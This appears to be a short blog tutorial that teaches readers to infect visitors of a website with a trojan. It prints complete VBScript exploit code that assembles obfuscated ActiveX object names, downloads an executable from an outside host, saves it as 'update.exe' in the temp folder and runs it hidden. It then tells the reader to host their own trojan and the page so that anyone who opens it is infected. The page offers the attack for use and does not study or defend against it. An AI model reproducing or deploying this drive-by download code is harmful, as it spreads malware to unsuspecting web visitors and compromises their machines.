All you must have heard tht some one got infected with a trojan by visiting some website .
In this Tutorial i am going to help you understand how tht is done !!!
Look at this Html code,
<HTML>
<BODY>
<script language="VBScript">
on error resume next
dl = "www.abc.com/trojan.exe"
Set df = document.createElement("object")
cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cls4
df.setAttribute "classid",clsfull
strr1="Mic"
strr2="roso"
strr3="ft."
strr4="XML"
strr5="HTTP"
strr=strr1&strr2&strr3&strr4&strr5
Set x = df.CreateObject(strr,"")
ab1="A"
ab2="dod"
ab3="b.S"
ab4="t"
ab5="re"
ab6="am"
strb1=ab1&ab2&ab3&ab4&ab5&ab6
strb5=strb1
set YY = df.createobject(strb5,"")
YY.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fnamezz1="update.exe"
scripp1="Scrip"
scripp2="ting"
scripp3=".Fil"
scripp4="eSyste"
scripp5="mObject"
scripp=scripp1&scripp2&scripp3&scripp4&scripp5
set FF = df.createobject(scripp,"")
set tmp = F.GetSpecialFolder(2)
fnamezz1= FF.BuildPath(tmp,fnamezz1)
YY.open
YY.write x.responseBody
YY.savetofile fnamezz1,2
YY.close
set MM = df.createobject("Shell.Application","")
MM.ShellExecute fnamezz1,"","","open",0
</script>
</BODY>
</HTML>
This was a normal html code which would create a simple webpage.
Now what you have to do is, the server
file of your trojan you will have to upload it on some webhosting and
then change the link of the server file in the code and then save this
code as "index.html" and then upload it to the same host.
All done, now everytime someone opens that webpage they would be infected with your trojan's server.
No comments:
Post a Comment